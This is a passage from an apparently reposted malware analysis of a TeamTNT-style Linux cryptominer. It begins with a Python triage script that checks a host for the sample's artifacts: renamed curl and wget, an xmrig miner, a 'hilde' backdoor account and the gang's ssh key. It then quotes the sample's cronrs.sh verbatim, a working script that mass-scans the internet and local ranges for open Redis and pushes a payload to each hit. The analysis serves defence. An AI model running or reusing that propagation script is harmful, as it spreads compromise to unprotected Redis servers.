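
# Files and directories the scripts create or rename (relative to root)
ARTIFACT_PATHS = {
    "usr/bin/cd1": "curl renamed by cronis.sh (mv /usr/bin/curl to /usr/bin/cd1)",
    "usr/bin/wd1": "wget renamed by cronis.sh (mv /usr/bin/wget to /usr/bin/wd1)",
    "var/tmp/.../dia": "Diamorphine build directory from installdia()",
    "var/tmp/.system/[ext4]": "xmrig renamed to [ext4] by SetupMoneroOcean1()",
    "var/tmp/.system/[scan]": "cronrs.sh dropped by cronscan",
}
KEY_FILES = ("root/.ssh/authorized_keys", "root/.ssh/authorized_keys2",
             "home/hilde/.ssh/authorized_keys", "home/hilde/.ssh/authorized_keys2")


def _read(root, rel):
    """Read a text file under root; a missing file reads as empty."""
    try:
        with open(os.path.join(root, rel), encoding="utf-8", errors="replace") as f:
            return f.read()
    except OSError:
        return ""


def triage(root="/"):
    """Return human-readable findings for the host rooted at 'root' ([] = clean).
    Immutable-bit abuse (chattr +ia) is not checked here; use lsattr for that."""
    findings = []
    for rel, why in ARTIFACT_PATHS.items():
        if os.path.lexists(os.path.join(root, rel)):
            findings.append(f"{rel}: {why}")
    if any(ln.startswith("hilde:") for ln in _read(root, "etc/passwd").splitlines()):
        findings.append("etc/passwd: backdoor account 'hilde' from makesshaxx()")
    if "hilde" in _read(root, "etc/sudoers"):
        findings.append("etc/sudoers: 'hilde' granted sudo")
    if "SELINUX=disabled" in _read(root, "etc/selinux/config"):
        findings.append("etc/selinux/config: SELinux disabled (weak signal on its own)")
    for rel in KEY_FILES:
        if TNT_KEY_PREFIX in _read(root, rel):
            findings.append(f"{rel}: TeamTNT ssh key present")
    if "ExecStart=/var/tmp/.system/[scan]" in _read(root, "etc/systemd/system/scan.service"):
        findings.append("scan.service: ExecStart points at /var/tmp/.system/[scan]")
    return findings


def make_demo_root(infected=True):
    """Build a throwaway tree with (or without) constructed traces of the sample."""
    root = tempfile.mkdtemp(prefix="tnt-triage-")
    files = {"etc/passwd": "root:x:0:0:root:/root:/bin/bash\n",
             "etc/sudoers": "root ALL=(ALL:ALL) ALL\n",
             "etc/selinux/config": "SELINUX=enforcing\n"}
    if infected:
        files["etc/passwd"] += "hilde:x:1000:1000::/home/hilde:/bin/bash\n"
        files["etc/sudoers"] += "hilde  ALL=(ALL:ALL) ALL\n"
        files["etc/selinux/config"] = "SELINUX=disabled\n"
        files["usr/bin/cd1"] = "placeholder for the renamed curl binary\n"
        files["var/tmp/.system/[ext4]"] = "placeholder for the renamed xmrig binary\n"
        files["home/hilde/.ssh/authorized_keys"] = f"ssh-rsa {TNT_KEY_PREFIX}<rest of key elided>\n"
        files["etc/systemd/system/scan.service"] = (
            "[Service]\nExecStart=/var/tmp/.system/[scan]\nRestart=always\n")
    for rel, content in files.items():
        path = os.path.join(root, rel)
        os.makedirs(os.path.dirname(path), exist_ok=True)
        with open(path, "w", encoding="utf-8") as f:
            f.write(content)
    return root


if __name__ == "__main__":
    for line in triage(make_demo_root()):
        print(line)
```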

Sample analysis: cronrs.sh

Runs the scanners to look for unauthenticated Redis instances in the 192.168.0.0/16, 172.16.0.0/16, 116.62.0.0/16, 116.232.0.0/16, 116.128.0.0/16 and 116.163.0.0/16 ranges, widening the attack. The hex strings passed to pnscan decode to the RESP-encoded Redis INFO command (*1, $4, info, each followed by CRLF) as the probe and to the response substring os:Linux as the match, so only Linux Redis instances that answer INFO without authentication end up in the lists fed to redis-cli.

pnx=pnscan
    [ -x /usr/local/bin/pnscan ] && pnx=/usr/local/bin/pnscan
    [ -x /usr/bin/pnscan ] && pnx=/usr/bin/pnscan
    for z in $( seq 0 5000 | sort -R ); do
    for x in $( echo -e "47\n39\n8\n121\n106\n120\n123\n65\n3\n101\n139\n99\n63\n81\n44\n18\n119\n100\n42\n49\n118\n54\n1\n50\n114\n182\n52\n13\n34\n112\n115\n111\n116\n16\n35\n117\n124\n59\n36\n103\n82\n175\n122\n129\n45\n152\n159\n113\n15\n61\n180\n172\n157\n60\n218\n176\n58\n204\n140\n184\n150\n193\n223\n192\n75\n46\n188\n183\n222\n14\n104\n27\n221\n211\n132\n107\n43\n212\n148\n110\n62\n202\n95\n220\n154\n23\n149\n125\n210\n203\n185\n171\n146\n109\n94\n219\n134" | sort -R ); do
    for y in $( seq 0 255 | sort -R ); do
    $pnx -t256 -R '6f 73 3a 4c 69 6e 75 78' -W '2a 31 0d 0a 24 34 0d 0a 69 6e 66 6f 0d 0a' $x.$y.0.0/16 6379 > .r.$x.$y.o
    awk '/Linux/ {print $1, $3}' .r.$x.$y.o > .r.$x.$y.l
    while read -r h p; do
    cat .dat | redis-cli -h $h -p $p --raw &
    done < .r.$x.$y.l
    done
    done
        done
    sleep 1
    masscan --max-rate 10000 -p6379 --shard $( seq 1 22000 | sort -R | head -n1 )/22000 --exclude 255.255.255.255 0.0.0.0/0 2>/dev/null | awk '{print $6, substr($4, 1, length($4)-4)}' | sort | uniq > .shard
    sleep 1
    while read -r h p; do
    cat .dat | redis-cli -h $h -p $p --raw 2>/dev/null 1>/dev/null &
    done < .shard
    sleep 1
    masscan --max-rate 10000 -p6379 192.168.0.0/16 172.16.0.0/16 116.62.0.0/16 116.232.0.0/16 116.128.0.0/16 116.163.0.0/16 2>/dev/null | awk '{print $6, substr($4, 1, length($4)-4)}' | sort | uniq > .ranges
    sleep 1
    while read -r h p; do
    cat .dat | redis-cli -h $h -p $p --raw 2>/dev/null 1>/dev/null &
    done < .ranges
    sleep 1
    ip a | grep -oE '([0-9]{1,3}.?){4}/[0-9]{2}' 2>/dev/null | sed 's/\/\([0-9]\{2\}\)/\/16/g' > .inet
    sleep 1
    masscan --max-rate 10000 -p6379 -iL .inet | awk '{print $6, substr($4, 1, length($4)-4)}' | sort | uniq > .lan
    sleep 1
    while read -r h p; do
    cat .dat | redis-cli -h $h -p $p --raw 2>/dev/null 1>/dev/null &
    done < .lan
    sleep 60
    rm -rf .dat .shard .ranges .lan 2>/dev/null

This is my first time writing a sample analysis; if anything is poorly written or wrongly analysed, please go easy on me.

References

https://paper.seebug.org/1477/

https://www.hackingarticles.in/docker-for-pentester-abusing-docker-api/

https://blog.csdn.net/mdzz14/article/details/111656726

https://blog.csdn.net/u013642886/article/details/115934635

https://cloud.tencent.com/developer/article/1828407

https://github.com/m0nad/Diamorphine

By: Xianzhi forum (先知论坛)

Posted by admin on 2021-12-31 15:11:45; reposted by CN-SEC 中文网 at http://cn-sec.com/archives/710672.html (keep this link when reposting).
